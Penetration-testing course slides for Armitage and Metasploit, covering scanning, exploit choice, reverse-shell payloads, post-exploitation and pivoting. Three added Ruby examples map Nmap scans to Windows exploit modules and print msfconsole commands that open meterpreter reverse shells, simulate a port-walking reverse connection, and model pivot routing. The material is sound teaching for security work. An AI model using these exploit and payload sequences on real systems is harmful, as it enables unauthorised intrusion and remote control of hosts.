Armitage and Metasploit Penetration Testing Lab

Armitage and Metasploit Penetration Testing Lab. Raphael Mudge, rsmudge@gmail.com, Twitter: @armitagehacker

Overview: Personal Introduction, Penetration Testing Process, Course Overview.

Introduction: R. Mudge. Previous experiences: penetration tester; regional CCDC red team (x5); USAF security researcher; Armitage for Metasploit. Other experiences: WordPress grammar checker; a programming language.

Penetration Testing. What? Test security by doing what bad guys might do.

Penetration Testing. Why? Motivate the desire to make changes that improve security.

Penetration Testing. How? Demonstrate risk.

Types of Penetration Tests: Open Source Research, Network, Social Engineering, Wireless, Web Applications, Mobile.

Penetration Testing Process: Information Gathering, Reconnaissance, Access, Post-Exploitation.

Network Attack Process

Motivation

Course Overview: Penetration Testing, Metasploit, Getting Access, Post-Exploitation, Maneuver.

Goals: Install Metasploit; get access to hosts; post-exploitation.

Learning Check: Who is Raphael Mudge? Why penetration test? What are we doing today?

Armitage and Metasploit Penetration Testing Lab

Overview: What is Metasploit? Modules; Metasploit Console; Armitage.

What is Metasploit?

What is Metasploit? An analogy with Linux: Metasploit is to Linux as modules are to programs, as msfconsole is to /bin/bash, and as the RPC daemon is to sshd.

Modules

Modules and Magic: The Gathering. Examples: 1) Use an auxiliary module to enumerate SMB and find domain info; use the hashdump post module to gather credentials; use the psexec module to get code execution. 2) Use the snmp module to brute-force the community string; use cisco_download_config to download the router's config file.

Module Organization

Metasploit Command Sets. Metasploit Console: manage the database, manage sessions, configure and launch modules. Meterpreter: post-exploitation activities.

Console Cheat Sheet
use module - start configuring a module
show options - show configurable options
set varname value - set an option
exploit - launch an exploit module
run - launch a non-exploit module
sessions -i n - interact with session n
help command - get help for a command

msfconsole: open-ended; works in many places; one task / host at a time.

What is Armitage? A GUI for Metasploit. Goal: avoid this…

Armitage

Armitage Sightings…

Console Demo

Learning Check: What is a session? What is a payload? What do exploits do?

Armitage and Metasploit Penetration Testing Lab Getting Access

Overview: Remote Exploits, Exploit-free Attack, Client-side Exploits.

Network Attack Process

Remote Attack: Nmap scan; analyze the scan data; choose an exploit; select a payload; launch the exploit!

Which exploit do I use? Answer: these.
ms08_067_netapi - Windows XP/2003 era
ms09_050_smb2_negot.. - Windows Vista SP1/SP2
ms03_026_dcom - Windows 2000
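The "analyze scan data, choose an exploit" steps above are usually done by eye in Armitage's targets view. The script below is an added example (mine, not from the slides or from Metasploit) that does the same triage over Nmap's grepable output (`-oG`) using only the three exploits named in the table, then emits the `use` / `set` / `exploit` sequence from the console cheat sheet. The scan output is constructed, not a real scan; the full module paths are the ones Metasploit uses (the slide abbreviates `ms09_050_smb2_negotiate_func_index`); the `LHOST` value is an assumption. One caveat: the slides date from when exploits took a single `RHOST`; current Metasploit exploits use `RHOSTS` instead.

```ruby
# Added example: map Nmap -oG output to the slide's three remote exploits,
# then print the msfconsole commands from the cheat sheet for each match.
# Nothing here talks to Metasploit; it only prepares what you would type.

# Constructed sample of `nmap -O -oG -` output (not a real scan).
SAMPLE_GNMAP = <<~GNMAP
  # Nmap 5.51 scan initiated (constructed sample)
  Host: 10.0.0.5 ()\tStatus: Up
  Host: 10.0.0.5 ()\tPorts: 135/open/tcp//msrpc///, 139/open/tcp//netbios-ssn///, 445/open/tcp//microsoft-ds///\tOS: Microsoft Windows XP SP2 or SP3
  Host: 10.0.0.6 ()\tPorts: 135/open/tcp//msrpc///, 445/open/tcp//microsoft-ds///\tOS: Microsoft Windows Vista SP1
  Host: 10.0.0.7 ()\tPorts: 135/open/tcp//msrpc///, 445/closed/tcp//microsoft-ds///\tOS: Microsoft Windows 2000 SP4
  Host: 10.0.0.8 ()\tPorts: 22/open/tcp//ssh///\tOS: Linux 2.6.X
GNMAP

# The slide's "Which exploit do I use?" table: required open port plus an
# OS fingerprint pattern. Full module paths as found in Metasploit's tree.
CANDIDATES = [
  { module: "exploit/windows/smb/ms08_067_netapi",
    port: 445, os: /Windows (XP|Server 2003|2003)/ },
  { module: "exploit/windows/smb/ms09_050_smb2_negotiate_func_index",
    port: 445, os: /Windows Vista SP[12]/ },
  { module: "exploit/windows/dcerpc/ms03_026_dcom",
    port: 135, os: /Windows 2000/ },
].freeze

Host = Struct.new(:ip, :open_ports, :os)

# Grepable Nmap output: one "Host:" line per host per section, tab-separated
# fields such as "Ports: 445/open/tcp//microsoft-ds///" and "OS: ...".
def parse_gnmap(text)
  hosts = {}
  text.each_line do |line|
    next unless line.start_with?("Host: ")
    fields = line.chomp.split("\t")
    ip = fields[0][/Host: (\S+)/, 1]
    host = hosts[ip] ||= Host.new(ip, [], nil)
    fields.each do |f|
      if f.start_with?("Ports: ")
        f.delete_prefix("Ports: ").split(",").each do |entry|
          port, state = entry.strip.split("/")
          host.open_ports << port.to_i if state == "open"   # skip closed/filtered
        end
      elsif f.start_with?("OS: ")
        host.os = f.delete_prefix("OS: ")
      end
    end
  end
  hosts.values
end

# Candidate exploits for a host: port must be open and OS guess must match.
def candidate_exploits(host)
  CANDIDATES.select { |c| host.open_ports.include?(c[:port]) && host.os.to_s =~ c[:os] }
            .map { |c| c[:module] }
end

# The cheat-sheet sequence. RHOST is the option name of the slides' era;
# newer Metasploit releases expect RHOSTS. LHOST is the attacker's address.
def console_commands(host, mod, lhost:)
  [
    "use #{mod}",
    "set RHOST #{host.ip}",
    "set PAYLOAD windows/meterpreter/reverse_tcp",
    "set LHOST #{lhost}",
    "exploit -j",
  ]
end

# Returns [ip, module] pairs for every host/exploit match in the scan.
def triage(text)
  parse_gnmap(text).flat_map { |h| candidate_exploits(h).map { |m| [h.ip, m] } }
end

if $PROGRAM_NAME == __FILE__
  parse_gnmap(SAMPLE_GNMAP).each do |host|
    candidate_exploits(host).each do |mod|
      puts "# #{host.ip} (#{host.os})"
      puts console_commands(host, mod, lhost: "10.0.0.99")   # LHOST is assumed
    end
  end
end
```

The Linux host gets no candidate, which is the point of checking both the port and the OS guess: an open 445 alone is not enough, and the learning check's answer (Windows XP SP2, port 445) falls out as ms08_067_netapi.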

Why did my exploit fail? Firewall; non-vulnerable software; service is hung; the universe is taunting you; unreliable exploit; bad day; misconfigured exploit; could not establish a session.

Exploit-free Attack: choose a payload; generate an executable; set up a multi/handler.

Payloads
windows/meterpreter/reverse_tcp - connects back to one port
windows/meterpreter/reverse_tcp_allports - tries every port in sequence
windows/meterpreter/reverse_https - speaks HTTPS (!!!!)
java/meterpreter/reverse_tcp - any platform with Java
linux/x86/shell_reverse_tcp
osx/x86/shell_reverse_tcp
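What the exploit-free attack and the payload table rely on is the direction of the connection: the multi/handler listens and the payload connects out to it, which is why a reverse payload gets through NAT and outbound filtering that would stop a bind shell. The block below is an added example written for this page, not Metasploit's handler or payload code: a tiny handler and a tiny "payload" in one process, with the payload walking a list of ports in sequence the way reverse_tcp_allports does until one accepts. Ports, the loopback address and the banner string are all my choices.

```ruby
# Added example: a miniature multi/handler plus a reverse-connecting
# "payload" that walks ports like reverse_tcp_allports. Loopback only;
# no exploitation, just the connection mechanics the slides describe.
require "socket"

# Handler side ("set up a multi/handler"): bind, wait for the callback,
# answer it. Runs in a thread so the same process can play both ends.
# The thread's value is the banner the payload announced itself with.
def start_handler(port)
  server = TCPServer.new("127.0.0.1", port)   # bound before we return: no race
  Thread.new do
    client = server.accept
    banner = client.gets&.chomp
    client.puts "HANDLER OK #{banner}"
    client.close
    server.close
    banner
  end
end

# Payload side: try each candidate port in order and stop at the first
# one that accepts; a closed or filtered port just means "next".
# Returns [port_used, handler_reply], or nil if nothing answered.
def reverse_connect_allports(ports, banner)
  ports.each do |port|
    begin
      sock = TCPSocket.new("127.0.0.1", port)
    rescue Errno::ECONNREFUSED, Errno::ETIMEDOUT, Errno::EHOSTUNREACH
      next
    end
    sock.puts banner
    reply = sock.gets&.chomp
    sock.close
    return [port, reply]
  end
  nil
end

# Start a handler on one port, then let the payload find it among several.
def demo(handler_port: 44_444, probe: [4440, 4441, 44_444, 44_445])
  handler = start_handler(handler_port)
  result = reverse_connect_allports(probe, "payload-v1")
  handler.join(5)
  result
end

if $PROGRAM_NAME == __FILE__
  port, reply = demo
  puts "connected back on #{port}: #{reply}"
end
```

Two things worth noticing against the payload table: reverse_tcp would give up after the first refused port, and the order of the probe list is exactly the trade-off of allports (it finds an allowed egress port, but the failed attempts are visible to anyone watching outbound connections). reverse_https is the same idea with the callback wrapped in TLS so it passes as web traffic.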

Client-side Attack: fingerprint a sample of victims; choose an exploit; launch the exploit; spam victims (or wait for them)!

Which exploit do I use? Answer: these.
java_signed_applet - social engineering; anywhere Java applets run
ms11_003_ie_css_import - Internet Explorer 7/8 (requires .NET)
ie_createobject - Internet Explorer 6

Learning Check: Which module listens for a connection from a payload? Which exploit works against Windows XP SP2, port 445?

Armitage and Metasploit Penetration Testing Lab Post-Exploitation

Overview: Command Shell, Privilege Escalation, Spying on the User, File Management, Process Management, Post Modules and Loot.

Network Attack Process

Demo

Learning Check: Which Meterpreter command takes a screenshot? Which Meterpreter command is most useful to you?

Armitage and Metasploit Penetration Testing Lab Maneuver

Overview: Pivoting, Scanning, Attacking.

Network Attack Process

Demo

Learning Check: Which module gives a session on a Windows host using credentials or hashes? Which scan should you do before setting up a pivot?
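The pivoting step is where the slides lean on a demo. The mechanism underneath is a route table: after `route add <subnet> <netmask> <session>` in msfconsole, the framework's socket layer sends traffic for that subnet through the Meterpreter session instead of the attacker's own interface, and a later scan or psexec against a host in that subnet rides the pivot. The block below is an added example I wrote for this page, a simplified re-implementation of that decision (most specific matching route wins, otherwise go direct), not Metasploit's own Rex::Socket::SwitchBoard code. Subnets, session numbers and addresses are constructed.

```ruby
# Added example: a pivot route table in the spirit of msfconsole's
# `route add` / `route remove`, answering "which session carries traffic
# to this address?" with longest-prefix match. Not Metasploit's code.
require "ipaddr"

Route = Struct.new(:network, :session)   # network: IPAddr carrying its prefix

class PivotTable
  def initialize
    @routes = []
  end

  # Equivalent of: route add 10.10.10.0 255.255.255.0 1
  # IPAddr accepts either a dotted netmask or a prefix length after the slash.
  def add(subnet, netmask, session)
    @routes << Route.new(IPAddr.new("#{subnet}/#{netmask}"), session)
    self
  end

  # Equivalent of: route remove 10.10.10.0 255.255.255.0 1
  # IPAddr#== ignores the mask, so compare the prefix length explicitly.
  def remove(subnet, netmask, session)
    net = IPAddr.new("#{subnet}/#{netmask}")
    @routes.reject! do |r|
      r.network == net && r.network.prefix == net.prefix && r.session == session
    end
    self
  end

  # Narrowest route containing the address wins; :direct when none does,
  # meaning the traffic leaves the attacker's own interface.
  def session_for(address)
    ip = IPAddr.new(address)
    best = @routes.select { |r| r.network.include?(ip) }
                  .max_by { |r| r.network.prefix }
    best ? best.session : :direct
  end

  # Mirrors `route print`: [subnet, prefix, session] rows.
  def to_a
    @routes.map { |r| [r.network.to_s, r.network.prefix, r.session] }
  end
end

if $PROGRAM_NAME == __FILE__
  # Constructed scenario: session 2 reaches the whole 10.10.0.0/16, and a
  # deeper foothold (session 1) sits inside 10.10.10.0/24.
  table = PivotTable.new
               .add("10.10.0.0", "255.255.0.0", 2)
               .add("10.10.10.0", "255.255.255.0", 1)
  %w[10.10.10.25 10.10.20.7 192.168.1.1].each do |target|
    puts "#{target} -> #{table.session_for(target)}"
  end
end
```

This also explains the learning check's ordering: you run the ARP scan through the existing session first because the route you add has to name a subnet that session can actually reach; a route for a subnet the session cannot see just black-holes the traffic.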

Network Attack Process

Armitage and Metasploit Penetration Testing Lab Resources

Free Metasploit Course http://www.offensive-security.com/metasploit-unleashed

Metasploit Homepage http://www.metasploit.com

Armitage Homepage http://www.fastandeasyhacking.com

BackTrack Linux http://www.backtrack-linux.org/

Pen Test & Vuln Analysis Course @ NYU http://pentest.cryptocity.net